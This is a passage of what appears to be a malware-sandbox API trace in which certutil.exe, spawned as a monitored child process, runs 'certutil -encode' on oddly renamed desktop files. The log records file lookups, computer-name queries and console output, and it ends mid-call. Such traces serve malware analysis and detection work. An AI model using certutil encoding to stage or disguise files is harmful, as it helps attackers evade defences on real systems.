3 [0267.401] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="encode", cchCount1=-1, lpString2="", cchCount2=-1) returned 3 [0267.401] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="encode", cchCount1=-1, lpString2="decodehex", cchCount2=-1) returned 3 [0267.401] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="encode", cchCount1=-1, lpString2="encodehex", cchCount2=-1) returned 1 [0267.401] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="encode", cchCount1=-1, lpString2="decode", cchCount2=-1) returned 3 [0267.401] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="encode", cchCount1=-1, lpString2="encode", cchCount2=-1) returned 2 [0267.401] LocalAlloc (uFlags=0x0, uBytes=0x20) returned 0x241d4db1c70 [0267.401] GetComputerNameW (in: lpBuffer=0x241d4db1c70, nSize=0x6021dff540 | out: lpBuffer="NQDPDE", nSize=0x6021dff540) returned 1 [0267.402] GetComputerNameExW (in: NameType=0x3, lpBuffer=0x0, nSize=0x6021dff510 | out: lpBuffer=0x0, nSize=0x6021dff510) returned 0 [0267.402] GetLastError () returned 0xea [0267.402] LocalAlloc (uFlags=0x0, uBytes=0x10) returned 0x241d4d9b960 [0267.402] GetComputerNameExW (in: NameType=0x3, lpBuffer=0x241d4d9b960, nSize=0x6021dff510 | out: lpBuffer="NQdPdE", nSize=0x6021dff510) returned 1 [0267.402] ?_set_se_translator@@YAP6AXIPEAU_EXCEPTION_POINTERS@@@ZP6AXI0@Z@Z () returned 0x0 [0267.407] CertCreateCertificateContext (dwCertEncodingType=0x1, pbCertEncoded=0x241d4db21f0, cbCertEncoded=0xd0e4) returned 0x0 [0267.444] CertCreateCRLContext (dwCertEncodingType=0x1, pbCrlEncoded=0x241d4db21f0, cbCrlEncoded=0xd0e4) returned 0x0 [0267.446] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x4, pbEncoded=0x241d4db21f0, cbEncoded=0xd0e4, dwFlags=0x8000, pDecodePara=0x6021dff3f0, pvStructInfo=0x6021dff480, pcbStructInfo=0x6021dff474 | out: pvStructInfo=0x6021dff480, pcbStructInfo=0x6021dff474) returned 0 [0267.446] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x15, pbEncoded=0x241d4db21f0, cbEncoded=0xd0e4, dwFlags=0x8000, pDecodePara=0x6021dff3f0, pvStructInfo=0x6021dff480, pcbStructInfo=0x6021dff474 | out: pvStructInfo=0x6021dff480, pcbStructInfo=0x6021dff474) returned 0 [0267.446] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x3b, pbEncoded=0x241d4db21f0, cbEncoded=0xd0e4, dwFlags=0x8000, pDecodePara=0x6021dff3f0, pvStructInfo=0x6021dff480, pcbStructInfo=0x6021dff474 | out: pvStructInfo=0x6021dff480, pcbStructInfo=0x6021dff474) returned 0 [0267.446] CryptMsgOpenToDecode (dwMsgEncodingType=0x10001, dwFlags=0x0, dwMsgType=0x0, hCryptProv=0x0, pRecipientInfo=0x0, pStreamInfo=0x0) returned 0x241d4d93a90 [0267.455] CryptMsgUpdate (hCryptMsg=0x241d4d93a90, pbData=0x241d4db21f0, cbData=0xd0e4, fFinal=1) returned 0 [0267.455] GetLastError () returned 0x8009310b [0267.456] CryptMsgClose (hCryptMsg=0x241d4d93a90) returned 1 [0267.456] GetFileAttributesExW (in: lpFileName="Yc0pm06NSLlWRhlBhv0.wav.Sister" (normalized: "c:\\users\\fd1hvy\\desktop\\yc0pm06nsllwrhlbhv0.wav.sister"), fInfoLevelId=0x0, lpFileInformation=0x6021dff4a0 | out: lpFileInformation=0x6021dff4a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x20d91df0, ftCreationTime.dwHighDateTime=0x1d5e301, ftLastAccessTime.dwLowDateTime=0xf20b5d00, ftLastAccessTime.dwHighDateTime=0x1d5e4a7, ftLastWriteTime.dwLowDateTime=0xf20b5d00, ftLastWriteTime.dwHighDateTime=0x1d5e4a7, nFileSizeHigh=0x0, nFileSizeLow=0xd0e4)) returned 1 [0267.456] _vsnwprintf (in: _Buffer=0x6021dff4a8, _BufferCount=0xb, _Format="%d", _ArgList=0x6021dff498 | out: _Buffer="359") returned 3 [0267.456] LoadStringW (in: hInstance=0x7ff70ad80000, uID=0x167, lpBuffer=0x6021dff260, cchBufferMax=128 | out: lpBuffer="Input Length = %d") returned 0x11 [0267.456] LocalAlloc (uFlags=0x0, uBytes=0x24) returned 0x241d4db1dc0 [0267.456] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0267.456] _vsnwprintf (in: _Buffer=0x6021dfe490, _BufferCount=0x1ff, _Format="Input Length = %d", _ArgList=0x6021dff4e8 | out: _Buffer="Input Length = 53476") returned 20 [0267.456] GetFileType (hFile=0x50) returned 0x2 [0267.456] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x6021dfe490*, nNumberOfCharsToWrite=0x14, lpNumberOfCharsWritten=0x6021dfe444, lpReserved=0x0 | out: lpBuffer=0x6021dfe490*, lpNumberOfCharsWritten=0x6021dfe444*=0x14) returned 1 [0267.527] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0267.527] _vsnwprintf (in: _Buffer=0x6021dfe490, _BufferCount=0x1ff, _Format="\n", _ArgList=0x6021dff4e8 | out: _Buffer="\n") returned 1 [0267.527] GetFileType (hFile=0x50) returned 0x2 [0267.527] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x6021dfe490*, nNumberOfCharsToWrite=0x1, lpNumberOfCharsWritten=0x6021dfe444, lpReserved=0x0 | out: lpBuffer=0x6021dfe490*, lpNumberOfCharsWritten=0x6021dfe444*=0x1) returned 1 [0267.762] GetFileAttributesExW (in: lpFileName="Yc0pm06NSLlWRhlBhv0.wav.Cruel" (normalized: "c:\\users\\fd1hvy\\desktop\\yc0pm06nsllwrhlbhv0.wav.cruel"), fInfoLevelId=0x0, lpFileInformation=0x6021dff4a0 | out: lpFileInformation=0x6021dff4a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xca24348f, ftCreationTime.dwHighDateTime=0x1d6141f, ftLastAccessTime.dwLowDateTime=0xca24348f, ftLastAccessTime.dwHighDateTime=0x1d6141f, ftLastWriteTime.dwLowDateTime=0xca2f4c8f, ftLastWriteTime.dwHighDateTime=0x1d6141f, nFileSizeHigh=0x0, nFileSizeLow=0x11f76)) returned 1 [0267.763] _vsnwprintf (in: _Buffer=0x6021dff4a8, _BufferCount=0xb, _Format="%d", _ArgList=0x6021dff498 | out: _Buffer="361") returned 3 [0267.763] LoadStringW (in: hInstance=0x7ff70ad80000, uID=0x169, lpBuffer=0x6021dff260, cchBufferMax=128 | out: lpBuffer="Output Length = %d") returned 0x12 [0267.763] LocalAlloc (uFlags=0x0, uBytes=0x26) returned 0x241d4db1c40 [0267.763] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0267.763] _vsnwprintf (in: _Buffer=0x6021dfe490, _BufferCount=0x1ff, _Format="Output Length = %d", _ArgList=0x6021dff4e8 | out: _Buffer="Output Length = 73590") returned 21 [0267.763] GetFileType (hFile=0x50) returned 0x2 [0267.763] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x6021dfe490*, nNumberOfCharsToWrite=0x15, lpNumberOfCharsWritten=0x6021dfe444, lpReserved=0x0 | out: lpBuffer=0x6021dfe490*, lpNumberOfCharsWritten=0x6021dfe444*=0x15) returned 1 [0267.890] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0267.890] _vsnwprintf (in: _Buffer=0x6021dfe490, _BufferCount=0x1ff, _Format="\n", _ArgList=0x6021dff4e8 | out: _Buffer="\n") returned 1 [0267.890] GetFileType (hFile=0x50) returned 0x2 [0267.890] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x6021dfe490*, nNumberOfCharsToWrite=0x1, lpNumberOfCharsWritten=0x6021dfe444, lpReserved=0x0 | out: lpBuffer=0x6021dfe490*, lpNumberOfCharsWritten=0x6021dfe444*=0x1) returned 1 [0267.967] LocalFree (hMem=0x241d4db21f0) returned 0x0 [0267.968] ?_set_se_translator@@YAP6AXIPEAU_EXCEPTION_POINTERS@@@ZP6AXI0@Z@Z () returned 0x7ff70ad94120 [0267.968] _vsnwprintf (in: _Buffer=0x6021dff508, _BufferCount=0xb, _Format="%d", _ArgList=0x6021dff4f8 | out: _Buffer="2022") returned 4 [0267.969] LoadStringW (in: hInstance=0x7ff70ad80000, uID=0x7e6, lpBuffer=0x6021dff2c0, cchBufferMax=128 | out: lpBuffer="%ws: -%ws command completed successfully.") returned 0x29 [0267.969] LocalAlloc (uFlags=0x0, uBytes=0x54) returned 0x241d4d886f0 [0267.969] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0267.969] _vsnwprintf (in: _Buffer=0x6021dfe4f0, _BufferCount=0x1ff, _Format="%ws: -%ws command completed successfully.", _ArgList=0x6021dff548 | out: _Buffer="CertUtil: -encode command completed successfully.") returned 49 [0267.969] GetFileType (hFile=0x50) returned 0x2 [0267.969] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x6021dfe4f0*, nNumberOfCharsToWrite=0x31, lpNumberOfCharsWritten=0x6021dfe4a4, lpReserved=0x0 | out: lpBuffer=0x6021dfe4f0*, lpNumberOfCharsWritten=0x6021dfe4a4*=0x31) returned 1 [0268.040] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0268.040] _vsnwprintf (in: _Buffer=0x6021dfe4f0, _BufferCount=0x1ff, _Format="\n", _ArgList=0x6021dff548 | out: _Buffer="\n") returned 1 [0268.040] GetFileType (hFile=0x50) returned 0x2 [0268.040] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x6021dfe4f0*, nNumberOfCharsToWrite=0x1, lpNumberOfCharsWritten=0x6021dfe4a4, lpReserved=0x0 | out: lpBuffer=0x6021dfe4f0*, lpNumberOfCharsWritten=0x6021dfe4a4*=0x1) returned 1 [0268.115] LocalFree (hMem=0x0) returned 0x0 [0268.115] LocalFree (hMem=0x241d4d95e50) returned 0x0 [0268.115] LocalFree (hMem=0x241d4d92ea0) returned 0x0 [0268.115] SetLastError (dwErrCode=0x80070716) [0268.115] _vsnwprintf (in: _Buffer=0x6021dff578, _BufferCount=0xb, _Format="%d", _ArgList=0x6021dff568 | out: _Buffer="511") returned 3 [0268.115] LoadStringW (in: hInstance=0x7ff70ad80000, uID=0x1ff, lpBuffer=0x6021dff330, cchBufferMax=128 | out: lpBuffer="Command Succeeded") returned 0x11 [0268.115] LocalAlloc (uFlags=0x0, uBytes=0x24) returned 0x241d4db1d60 [0268.115] PostQuitMessage (nExitCode=0) [0268.115] GetMessageW (in: lpMsg=0x6021dffb70, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x6021dffb70) returned 0 [0268.116] LocalFree (hMem=0x241d4d9b960) returned 0x0 [0268.116] LocalFree (hMem=0x241d4db1c70) returned 0x0 [0268.116] LocalFree (hMem=0x0) returned 0x0 [0268.116] GetModuleHandleW (lpModuleName="certadm.dll") returned 0x0 [0268.117] GetLastError () returned 0x7e [0268.117] GetModuleHandleW (lpModuleName="certcli.dll") returned 0x7ffcdebe0000 [0268.117] GetProcAddress (hModule=0x7ffcdebe0000, lpProcName="DllMain") returned 0x7ffcdebe1530 [0268.117] DllMain () returned 0x1 [0268.117] LocalFree (hMem=0x241d4d9b8e0) returned 0x0 [0268.118] LocalFree (hMem=0x241d4d8bb50) returned 0x0 [0268.118] LocalFree (hMem=0x241d4db1dc0) returned 0x0 [0268.118] LocalFree (hMem=0x241d4db1c40) returned 0x0 [0268.118] LocalFree (hMem=0x241d4d886f0) returned 0x0 [0268.118] LocalFree (hMem=0x241d4db1d60) returned 0x0 [0268.118] LocalFree (hMem=0x241d4d909a0) returned 0x0 [0268.118] LocalFree (hMem=0x241d4d8b880) returned 0x0 [0268.118] GetModuleHandleW (lpModuleName="certenroll.dll") returned 0x0 [0268.118] GetLastError () returned 0x7e [0268.118] GetModuleHandleW (lpModuleName="certcli.dll") returned 0x7ffcdebe0000 [0268.118] GetProcAddress (hModule=0x7ffcdebe0000, lpProcName="DllMain") returned 0x7ffcdebe1530 [0268.119] DllMain () returned 0x1 [0268.119] exit (_Code=0) Thread: id = 96 os_tid = 0xab0 Thread: id = 97 os_tid = 0x60 Process: id = "36" image_name = "certutil.exe" filename = "c:\\windows\\system32\\certutil.exe" page_root = "0x9cd8000" os_pid = "0xd48" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "3" os_parent_pid = "0x1190" cmd_line = "certutil -encode \"YgF_fsDPEPZ_A1NWq.png.Sister\" \"YgF_fsDPEPZ_A1NWq.png.Cruel\"" cur_dir = "C:\\Users\\FD1HVy\\Desktop\\" os_username = "NQDPDE\\FD1HVy" bitness = "32" os_groups = "NQDPDE\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000fd03" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 98 os_tid = 0x348 [0270.125] GetStartupInfoW (in: lpStartupInfo=0xf04a6cfa20 | out: lpStartupInfo=0xf04a6cfa20*(cb=0x68, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="certutil -encode \"YgF_fsDPEPZ_A1NWq.png.Sister\" \"YgF_fsDPEPZ_A1NWq.png.Cruel\"", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0)) [0270.127] GetModuleHandleW (lpModuleName=0x0) returned 0x7ff70ad80000 [0270.127] __set_app_type (_Type=0x1) [0270.127] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x7ff70ae6cd90) returned 0x0 [0270.128] __wgetmainargs (in: _Argc=0x7ff70aed3898, _Argv=0x7ff70aed38a0, _Env=0x7ff70aed38a8, _DoWildCard=0, _StartInfo=0x7ff70aed38b4 | out: _Argc=0x7ff70aed3898, _Argv=0x7ff70aed38a0, _Env=0x7ff70aed38a8) returned 0 [0270.130] _onexit (_Func=0x7ff70ae745a0) returned 0x7ff70ae745a0 [0270.130] _onexit (_Func=0x7ff70ae746c0) returned 0x7ff70ae746c0 [0270.131] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x7ffce9120000 [0270.131] GetProcAddress (hModule=0x7ffce9120000, lpProcName="WerSetFlags") returned 0x7ffce913a530 [0270.131] WerSetFlags () returned 0x0 [0270.132] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0270.132] __iob_func () returned 0x7ffcea2dea00 [0270.132] _fileno (_File=0x7ffcea2dea30) returned 1 [0270.132] _setmode (_FileHandle=1, _Mode=16384) returned 16384 [0270.132] _wsetlocale (category=1, locale=".OCP") returned="English_United States.437" [0270.133] _wsetlocale (category=3, locale=".OCP") returned="English_United States.437" [0270.133] _wsetlocale (category=4, locale=".OCP") returned="English_United States.437" [0270.133] _wsetlocale (category=5, locale=".OCP") returned="English_United States.437" [0270.134] GetConsoleOutputCP () returned 0x1b5 [0270.207] _vsnwprintf (in: _Buffer=0xf04a6cf990, _BufferCount=0xb, _Format=".%d", _ArgList=0xf04a6cf8b8 | out: _Buffer=".437") returned 4 [0270.207] _wsetlocale (category=2, locale=".437") returned="English_United States.437" [0270.207] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0270.207] GetFileType (hFile=0x50) returned 0x2 [0270.207] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x7ffce9120000 [0270.207] GetProcAddress (hModule=0x7ffce9120000, lpProcName="SetThreadUILanguage") returned 0x7ffce913a990 [0270.208] SetThreadUILanguage (LangId=0x0) returned 0x409 [0270.277] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1=".exe", cchCount1=-1, lpString2=".exe", cchCount2=-1) returned 2 [0270.277] GetCommandLineW () returned="certutil -encode \"YgF_fsDPEPZ_A1NWq.png.Sister\" \"YgF_fsDPEPZ_A1NWq.png.Cruel\"" [0270.277] LocalAlloc (uFlags=0x0, uBytes=0x12) returned 0x25286b5b7a0 [0270.277] LocalAlloc (uFlags=0x0, uBytes=0x1a) returned 0x25286b4cbb0 [0270.277] LocalFree (hMem=0x25286b5b7a0) returned 0x0 [0270.277] LocalAlloc (uFlags=0x0, uBytes=0x1a) returned 0x25286b4b900 [0270.277] LocalAlloc (uFlags=0x0, uBytes=0x22) returned 0x25286b4bae0 [0270.277] LocalFree (hMem=0x25286b4b900) returned 0x0 [0270.277] LocalFree (hMem=0x25286b4cbb0) returned 0x0 [0270.277] LocalFree (hMem=0x0) returned 0x0 [0270.277] ?_set_se_translator@@YAP6AXIPEAU_EXCEPTION_POINTERS@@@ZP6AXI0@Z@Z () returned 0x0 [0270.278] ?_set_se_translator@@YAP6AXIPEAU_EXCEPTION_POINTERS@@@ZP6AXI0@Z@Z () returned 0x7ff70ad94120 [0270.278] GetCommandLineW () returned="certutil -encode \"YgF_fsDPEPZ_A1NWq.png.Sister\" \"YgF_fsDPEPZ_A1NWq.png.Cruel\"" [0270.278] LocalAlloc (uFlags=0x0, uBytes=0x12) returned 0x25286b5b560 [0270.278] GetSystemTime (in: lpSystemTime=0xf04a6cf680 | out: lpSystemTime=0xf04a6cf680*(wYear=0x7e4, wMonth=0x4, wDayOfWeek=0x4, wDay=0x10, wHour=0x12, wMinute=0x31, wSecond=0x2c, wMilliseconds=0x333)) [0270.278] SystemTimeToFileTime (in: lpSystemTime=0xf04a6cf680, lpFileTime=0xf04a6cf678 | out: lpFileTime=0xf04a6cf678) returned 1 [0270.279] FileTimeToLocalFileTime (in: lpFileTime=0xf04a6cf678, lpLocalFileTime=0xf04a6cf640 | out: lpLocalFileTime=0xf04a6cf640) returned 1 [0270.279] FileTimeToSystemTime (in: lpFileTime=0xf04a6cf640, lpSystemTime=0xf04a6cf3b0 | out: lpSystemTime=0xf04a6cf3b0) returned 1 [0270.279] GetDateFormatW (in: Locale=0x400, dwFlags=0x1, lpDate=0xf04a6cf3b0, lpFormat=0x0, lpDateStr=0xf04a6cf4c0, cchDate=128 | out: lpDateStr="4/16/2020") returned 10 [0270.279] GetTimeFormatW (in: Locale=0x400, dwFlags=0x2, lpTime=0xf04a6cf3b0, lpFormat=0x0, lpTimeStr=0xf04a6cf3c0, cchTime=128 | out: lpTimeStr="8:49 PM") returned 8 [0270.279] _vsnwprintf (in: _Buffer=0xf04a6cf3ce, _BufferCount=0x78, _Format=" %02u.%03us", _ArgList=0xf04a6cf398 | out: _Buffer=" 44.819s") returned 8 [0270.279] LocalAlloc (uFlags=0x0, uBytes=0x34) returned 0x25286b5dfa0 [0270.279] SetLastError (dwErrCode=0x80070716) [0270.279] _vsnwprintf (in: _Buffer=0xf04a6cf448, _BufferCount=0xb, _Format="%d", _ArgList=0xf04a6cf438 | out: _Buffer="948") returned 3 [0270.279] LoadStringW (in: hInstance=0x7ff70ad80000, uID=0x3b4, lpBuffer=0xf04a6cf200, cchBufferMax=128 | out: lpBuffer="Begin") returned 0x5 [0270.279] LocalAlloc (uFlags=0x0, uBytes=0xc) returned 0x25286b5ba00 [0270.279] LocalAlloc (uFlags=0x0, uBytes=0x640) returned 0x25286b542e0 [0270.279] LocalFree (hMem=0x25286b5dfa0) returned 0x0 [0270.280] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf04a6cf6f0 | out: lpSystemTimeAsFileTime=0xf04a6cf6f0*(dwLowDateTime=0xcbb5527b, dwHighDateTime=0x1d6141f)) [0270.280] GetLocalTime (in: lpSystemTime=0xf04a6cf728 | out: lpSystemTime=0xf04a6cf728*(wYear=0x7e4, wMonth=0x4, wDayOfWeek=0x4, wDay=0x10, wHour=0x14, wMinute=0x31, wSecond=0x2c, wMilliseconds=0x334)) [0270.280] SystemTimeToFileTime (in: lpSystemTime=0xf04a6cf728, lpFileTime=0xf04a6cf700 | out: lpFileTime=0xf04a6cf700) returned 1 [0270.280] CompareFileTime (lpFileTime1=0xf04a6cf700, lpFileTime2=0xf04a6cf6f0) returned 1 [0270.280] _vsnwprintf (in: _Buffer=0xf04a6cf738, _BufferCount=0x13, _Format="GMT %s %.2f", _ArgList=0xf04a6cf6c8 | out: _Buffer="GMT + 2.00") returned 10 [0270.280] LocalFree (hMem=0x25286b5b560) returned 0x0 [0270.280] GetModuleHandleW (lpModuleName="certca.dll") returned 0x7ffcde520000 [0270.280] FindResourceW (hModule=0x7ffcde520000, lpName=0x1, lpType=0x10) returned 0x7ffcde5e0090 [0270.281] LoadResource (hModule=0x7ffcde520000, hResInfo=0x7ffcde5e0090) returned 0x7ffcde5e00b0 [0270.281] LockResource (hResData=0x7ffcde5e00b0) returned 0x7ffcde5e00b0 [0270.281] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="VS_VERSION_INFO", cchCount1=-1, lpString2="VS_VERSION_INFO", cchCount2=-1) returned 2 [0270.281] _vsnwprintf (in: _Buffer=0x7ff70aed6890, _BufferCount=0x3f, _Format="%u.%u.%u.%u", _ArgList=0xf04a6cf768 | out: _Buffer="10.0.15063.447") returned 14 [0270.281] GetACP () returned 0x4e4 [0270.281] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x7ff70ae9f388, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 7 [0270.281] LocalAlloc (uFlags=0x0, uBytes=0x10) returned 0x25286b5b940 [0270.281] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x7ff70ae9f388, cbMultiByte=-1, lpWideCharStr=0x25286b5b940, cchWideChar=7 | out: lpWideCharStr="retail") returned 7 [0270.281] LocalAlloc (uFlags=0x0, uBytes=0x2c) returned 0x25286b5dde0 [0270.281] _vsnwprintf (in: _Buffer=0x25286b5dde0, _BufferCount=0x15, _Format="%ws %ws", _ArgList=0xf04a6cf7b8 | out: _Buffer="10.0.15063.447 retail") returned 21 [0270.281] LocalFree (hMem=0x25286b5b940) returned 0x0 [0270.281] LocalFree (hMem=0x0) returned 0x0 [0270.281] GetModuleHandleW (lpModuleName="certcli.dll") returned 0x7ffcdebe0000 [0270.281] GetACP () returned 0x4e4 [0270.281] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x7ff70ae9f388, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 7 [0270.281] LocalAlloc (uFlags=0x0, uBytes=0x10) returned 0x25286b5b460 [0270.281] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x7ff70ae9f388, cbMultiByte=-1, lpWideCharStr=0x25286b5b460, cchWideChar=7 | out: lpWideCharStr="retail") returned 7 [0270.281] LocalAlloc (uFlags=0x0, uBytes=0x2c) returned 0x25286b5e420 [0270.281] _vsnwprintf (in: _Buffer=0x25286b5e420, _BufferCount=0x15, _Format="%ws %ws", _ArgList=0xf04a6cf7b8 | out: _Buffer="10.0.15063.447 retail") returned 21 [0270.281] LocalFree (hMem=0x25286b5b460) returned 0x0 [0270.282] LocalFree (hMem=0x0) returned 0x0 [0270.282] GetACP () returned 0x4e4 [0270.282] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x7ff70ae9f388, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 7 [0270.282] LocalAlloc (uFlags=0x0, uBytes=0x10) returned 0x25286b5ba40 [0270.282] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x7ff70ae9f388, cbMultiByte=-1, lpWideCharStr=0x25286b5ba40, cchWideChar=7 | out: lpWideCharStr="retail") returned 7 [0270.282] LocalAlloc (uFlags=0x0, uBytes=0x2c) returned 0x25286b5dea0 [0270.282] _vsnwprintf (in: _Buffer=0x25286b5dea0, _BufferCount=0x15, _Format="%ws %ws", _ArgList=0xf04a6cf7e8 | out: _Buffer="10.0.15063.447 retail") returned 21 [0270.282] LocalFree (hMem=0x25286b5ba40) returned 0x0 [0270.282] LocalFree (hMem=0x25286b5dde0) returned 0x0 [0270.282] LocalFree (hMem=0x25286b5e420) returned 0x0 [0270.282] LocalFree (hMem=0x25286b5dea0) returned 0x0 [0270.282] LoadIconW (hInstance=0x0, lpIconName=0x7f00) returned 0x10027 [0270.282] LoadCursorW (hInstance=0x0, lpCursorName=0x7f00) returned 0x10003 [0270.282] GetStockObject (i=0) returned 0x900010 [0270.282] RegisterClassW (lpWndClass=0xf04a6cf910) returned 0xc1a2 [0270.284] CreateWindowExW (dwExStyle=0x0, lpClassName="CertUtil", lpWindowName="CertUtil Application", dwStyle=0xcf0000, X=-2147483648, Y=-2147483648, nWidth=-2147483648, nHeight=-2147483648, hWndParent=0x0, hMenu=0x0, hInstance=0x7ff70ad80000, lpParam=0x0) returned 0x1d02c8 [0270.401] NtdllDefWindowProc_W () returned 0x0 [0270.401] NtdllDefWindowProc_W () returned 0x1 [0270.408] NtdllDefWindowProc_W () returned 0x0 [0270.418] UpdateWindow (hWnd=0x1d02c8) returned 1 [0270.418] PostMessageW (hWnd=0x1d02c8, Msg=0x400, wParam=0x0, lParam=0x25286b4217e) returned 1 [0270.418] GetMessageW (in: lpMsg=0xf04a6cf960, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0xf04a6cf960) returned 1 [0270.418] TranslateMessage (lpMsg=0xf04a6cf960) returned 0 [0270.418] DispatchMessageW (lpMsg=0xf04a6cf960) returned 0x0 [0270.418] NtdllDefWindowProc_W () returned 0x0 [0270.418] GetMessageW (in: lpMsg=0xf04a6cf960, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0xf04a6cf960) returned 1 [0270.418] TranslateMessage (lpMsg=0xf04a6cf960) returned 0 [0270.418] DispatchMessageW (lpMsg=0xf04a6cf960) returned 0x0 [0270.418] LocalAlloc (uFlags=0x0, uBytes=0x8a) returned 0x25286b4f350 [0270.418] LocalAlloc (uFlags=0x0, uBytes=0x96) returned 0x25286b44430 [0270.419] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="encode", cchCount1=-1, lpString2="p", cchCount2=-1) returned 1 [0270.419] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="encode", cchCount1=-1, lpString2="pin", cchCount2=-1) returned 1 [0270.419] SetLastError (dwErrCode=0x80070716) [0270.419] _vsnwprintf (in: _Buffer=0xf04a6cf368, _BufferCount=0xb, _Format="%d", _ArgList=0xf04a6cf358 | out: _Buffer="465") returned 3 [0270.419] LoadStringW (in: hInstance=0x7ff70ad80000, uID=0x1d1, lpBuffer=0xf04a6cf120, cchBufferMax=128 | out: lpBuffer="Command Line") returned 0xc [0270.419] LocalAlloc (uFlags=0x0, uBytes=0x1a) returned 0x25286b4bd20 [0270.419] ?_set_se_translator@@YAP6AXIPEAU_EXCEPTION_POINTERS@@@ZP6AXI0@Z@Z () returned 0x0 [0270.419] ?_set_se_translator@@YAP6AXIPEAU_EXCEPTION_POINTERS@@@ZP6AXI0@Z@Z () returned 0x7ff70ad94120 [0270.419] GetEnvironmentVariableW (in: lpName="certsrv_rawhex", lpBuffer=0xf04a6cf100, nSize=0x104 | out: lpBuffer="\x01") returned 0x0 [0270.419] GetLastError () returned 0xcb [0270.420] _wcsnicmp (_String1="Config", _String2="enroll", _MaxCount=0x6) returned -2 [0270.420] _wcsnicmp (_String1="CA", _String2="en", _MaxCount=0x2) returned -2 [0270.420] _wcsnicmp (_String1="Policy", _String2="enroll", _MaxCount=0x6) returned 11 [0270.420] _wcsnicmp (_String1="Exit", _String2="enro", _MaxCount=0x4) returned 10 [0270.420] _wcsnicmp (_String1="Restore", _String2="enroll", _MaxCount=0x7) returned 13 [0270.420] _wcsnicmp (_String1="Template", _String2="enroll", _MaxCount=0x8) returned 15 [0270.420] _wcsnicmp (_String1="Enroll", _String2="enroll", _MaxCount=0x6) returned 0 [0270.420] _wcsnicmp (_String1="Config", _String2="enroll", _MaxCount=0x6) returned -2 [0270.420] _wcsnicmp (_String1="CA", _String2="en", _MaxCount=0x2) returned -2 [0270.420] _wcsnicmp (_String1="Policy", _String2="enroll", _MaxCount=0x6) returned 11 [0270.420] _wcsnicmp (_String1="Exit", _String2="enro", _MaxCount=0x4) returned 10 [0270.420] _wcsnicmp (_String1="Restore", _String2="enroll", _MaxCount=0x7) returned 13 [0270.420] _wcsnicmp (_String1="Template", _String2="enroll", _MaxCount=0x8) returned 15 [0270.420] _wcsnicmp (_String1="Enroll", _String2="enroll", _MaxCount=0x6) returned 0 [0270.420] _wcsnicmp (_String1="Config", _String2="enroll", _MaxCount=0x6) returned -2 [0270.420] _wcsnicmp (_String1="CA", _String2="en", _MaxCount=0x2) returned -2 [0270.420] _wcsnicmp (_String1="Policy", _String2="enroll", _MaxCount=0x6) returned 11 [0270.420] _wcsnicmp 